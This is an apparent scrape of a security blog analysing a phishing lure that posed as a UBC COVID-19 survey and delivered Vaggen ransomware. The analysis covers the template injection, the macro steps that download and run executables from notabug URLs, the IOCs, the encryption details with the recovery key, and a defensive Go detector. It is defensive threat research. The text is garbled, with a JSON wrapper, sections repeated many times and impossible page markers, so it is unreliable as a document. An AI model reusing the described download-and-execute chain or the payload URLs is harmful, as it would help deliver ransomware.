{
	"id": "b5ecc706-8b64-43a3-8a5e-4d2a1ac11d23",
	"created_at": "2026-04-10T03:20:15.505884Z",
	"updated_at": "2026-04-10T03:22:22.87612Z",
	"deleted_at": null,
	"sha1_hash": "215d11eb1f4328ea10a9add6803aff006e3356e2",
	"title": "Fake COVID-19 survey hides ransomware in Canadian university attack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10915459,
	"plain_text": "Fake COVID-19 survey hides ransomware in Canadian university attack\r\nPublished: 2020-10-27 · Archived: 2026-04-10 02:19:11 UTC\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1 of 3467\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted about a particular event.\r\nThis can be very useful as an early-warning system that an intruder has had access to a network. In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir\r\nmain_ELDBJORT -\u003e main_encryptFile\r\nmain_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (such as the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is implemented as the callback of the standard Go function path/filepath.Walk.\r\nFiles are encrypted with AES-256 (32-byte key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the gcm.Seal function.\r\nThe output file (with the .VAGGEN extension) contains:\r\nthe 12-byte nonce\r\nthe encrypted content\r\nthe 16-byte GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint a better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nIOCs\r\n"
}
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 40 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 41 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 42 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 43 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 44 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 45 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 46 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 47 of 
3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 48 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. 
When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 49 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 50 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 51 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 52 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 53 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 54 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 55 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 56 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 57 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 58 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 59 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 60 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 61 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 62 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 63 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 64 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 65 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 66 of 
Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!
You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!
In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro.
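One static check a defender can run on a suspicious .docx follows directly from how template injection works: Word records the attached template as a relationship in word/_rels/settings.xml.rels, and a remotely hosted template appears there as an attachedTemplate relationship with TargetMode="External" and an http(s) or UNC target, whereas a legitimately customized document points at a local file:/// path. The Go checker below is an added example rather than code from the write-up; the two .docx fixtures and the https://example.invalid/template.dotm URL are constructed here.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// Relationship type Word uses to point a document at its attached template.
const attachedTemplateRel = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

// Part inside the .docx zip where Word stores that pointer.
const settingsRels = "word/_rels/settings.xml.rels"

type relationship struct {
	Type       string `xml:"Type,attr"`
	Target     string `xml:"Target,attr"`
	TargetMode string `xml:"TargetMode,attr"`
}

type relationships struct {
	Rels []relationship `xml:"Relationship"`
}

// isRemote flags targets that make Word fetch the template over the network.
// A local file:/// path, the normal case for a document built from a custom
// template, is deliberately not flagged.
func isRemote(target string) bool {
	t := strings.ToLower(strings.TrimSpace(target))
	return strings.HasPrefix(t, "http://") || strings.HasPrefix(t, "https://") || strings.HasPrefix(t, `\\`)
}

// RemoteTemplates opens a .docx (a zip archive) and returns every external
// attachedTemplate target that points at a network location.
func RemoteTemplates(docx []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(docx), int64(len(docx)))
	if err != nil {
		return nil, fmt.Errorf("not a valid OOXML zip: %w", err)
	}
	var hits []string
	for _, f := range zr.File {
		if f.Name != settingsRels {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		raw, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(raw, &rels); err != nil {
			return nil, err
		}
		for _, r := range rels.Rels {
			if r.Type == attachedTemplateRel && r.TargetMode == "External" && isRemote(r.Target) {
				hits = append(hits, r.Target)
			}
		}
	}
	return hits, nil
}

// BuildDocx constructs a minimal in-memory .docx holding only the relationship
// part we inspect; it is a test fixture, not a real document.
func BuildDocx(rels string) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	w, _ := zw.Create(settingsRels)
	w.Write([]byte(rels))
	zw.Close()
	return buf.Bytes()
}

// Constructed fixtures: the first mirrors the injection pattern (remote .dotm),
// the second a legitimate document whose template lives on the local disk.
const (
	MaliciousRels = `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="` + attachedTemplateRel + `" Target="https://example.invalid/template.dotm" TargetMode="External"/>
</Relationships>`
	BenignRels = `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="` + attachedTemplateRel + `" Target="file:///C:\Users\user\Templates\Normal.dotm" TargetMode="External"/>
</Relationships>`
)

func main() {
	hits, err := RemoteTemplates(BuildDocx(MaliciousRels))
	fmt.Println("remote templates:", hits, "err:", err)
}
```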
The template file was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute killar.exe
Checks the return value of the Shell function to determine whether it was successful (the return value is the task ID of the executed application)
If successful, sends a GET HTTP request to: canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If not successful, sends a GET HTTP request to: canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document triggers a notification via the canarytokens.com website. Typically, people use this type of service to get alerted about a particular event.

This can be very useful as an early warning system that an intruder has had access to a network.
In this case, the attacker is probably interested in how many people opened the document, and perhaps where they are from.

Vaggen ransomware

